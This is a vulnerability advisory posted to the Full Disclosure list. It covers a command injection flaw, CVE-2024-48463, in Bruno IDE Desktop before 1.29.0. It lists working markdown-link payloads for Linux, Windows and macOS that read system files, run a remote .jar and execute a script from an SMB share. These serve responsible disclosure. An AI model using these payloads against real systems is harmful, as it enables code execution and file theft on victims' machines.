=====[ Tempest Security Intelligence - ADV-10/2024
]==========================
Bruno IDE Desktop prior to 1.29.0
Author: Rodolfo Tavares
Tempest Security Intelligence - Recife, Pernambuco - Brazil
=====[ Table of Contents ]==================================================
Overview
Detailed Description
Timeline of Disclosure
Thanks & Acknowledgements
References
=====[ Vulnerability Information
]===========================================
Class: Improper Neutralization of Input During Web Page Generation
('Command Injection') [CWE-78]
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - 9.8
=====[ Overview ]===========================================================
System Affected: Bruno IDE Desktop
Software Version: All versions prior to 1.29.0
Impacts:
Vulnerability: A command injection vulnerability in the function
shell.openExternal of Bruno IDE Desktop prior to version 1.29.0 allows
attackers to execute arbitrary commands by supplying a crafted URL, leading
to potential remote code execution.
=====[ Detailed Description ]===============================================
Command Injection [PoC - Reproduction Steps]:
1. Launch Bruno IDE Desktop on any supported operating system.
2. Create a Collection and navigate to the Docs tab
3. Insert the following markdown payloads depending on the target OS:
Linux:
[passwd](/etc/passwd)
[smb](smb://localhost/public/x.desktop) - Malicious .desktop file
[sftp](sftp://user@localhost/home/user/s.desktop) - Malicious .desktop file
POC Video: https://www.youtube.com/watch?v=SPCGVLEfVgw
Windows:
[Calc](C:/Windows/system32/calc.exe)
If Java is installed, directly execute a malicious .jar file:
[exploit](http://localhost/pwn.jar)
[exploit](C:/Users/user/Downloads/pwn.jar)
POC Video: https://www.youtube.com/watch?v=KVwKQkXA-vI
macOS:
[calc](/System/Applications/Calculator.app) - Opens Calculator on macOS.
[calcFile](System/Applications/Calculator.app) - Another method to trigger
Calculator.
[exploit1](smb://10.211.55.6/public/hello.scptd) - Connects to a remote SMB
share and executes a script.
[exploit2](/Volumes/hello.scptd/Contents/Resources/Scripts/main.scpt) -
Executes a script from a mounted volume.
[file](///etc/hosts) - Reads the system’s /etc/hosts file.
[facetime1](facetime:+123456789) - Attempts to launch FaceTime with a
specific phone number.
[facetime2](facetime:some...@example.com) - Triggers FaceTime using an
email address.
[tel](tel:+123456789) - Initiates a phone call via the tel: protocol.
[mail](x-apple-reminder://) - Opens the Apple Reminders app via a custom
protocol.
[calendar](calendar://) - Attempts to open a calendar application.
POC Video: https://www.youtube.com/watch?v=S0W93tbKaFY
4. Upon execution, the crafted URL results in arbitrary command execution
in the victim's environment.
=====[ Timeline of Disclosure
]==============================================
14/Set/2024 - Responsible disclosure was initiated with the vendor.
16/Set/2024 - Vendor acknowledged the vulnerability.
20/Nov/2024 - The vendor released a patch (version 1.29.1) addressing the
issue.
24/Out/2024 - CVE-2024-48463 was assigned and reserved.
=====[ Thanks & Acknowledgements ]==========================================
Tempest Security Intelligence [1]
Rodolfo Tavares - Vulnerability Discover
Filipe Xavier - Special Thanks
Henrique Arcoverde - Special Thanks
=====[ References ]=========================================================
[1] https://www.tempest.com.br
[2] https://cwe.mitre.org/data/definitions/78.html
[3] https://gist.github.com/opcod3r/ab69f36d52367df7ffac32a597dff31c
[4] https://nvd.nist.gov/vuln/detail/CVE-2024-48463
=====[ EOF ]===============================================================
--
--
*Esta mensagem é para uso exclusivo de seu destinatário e pode conter
informações privilegiadas e confidenciais. Todas as informações aqui
contidas devem ser tratadas como confidenciais e não devem ser divulgadas a
terceiros sem o prévio consentimento por escrito da Tempest. Se você não é
o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste
caso, por favor, notifique o remetente da mesma e destrua imediatamente a
mensagem.*
*
*
*This message is intended solely for the use of its
addressee and may contain privileged or confidential information. All
information contained herein shall be treated as confidential and shall not
be disclosed to any third party without Tempest’s prior written approval.
If you are not the addressee you should not distribute, copy or file this
message. In this case, please notify the sender and destroy its contents
immediately.**
*
*
*
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
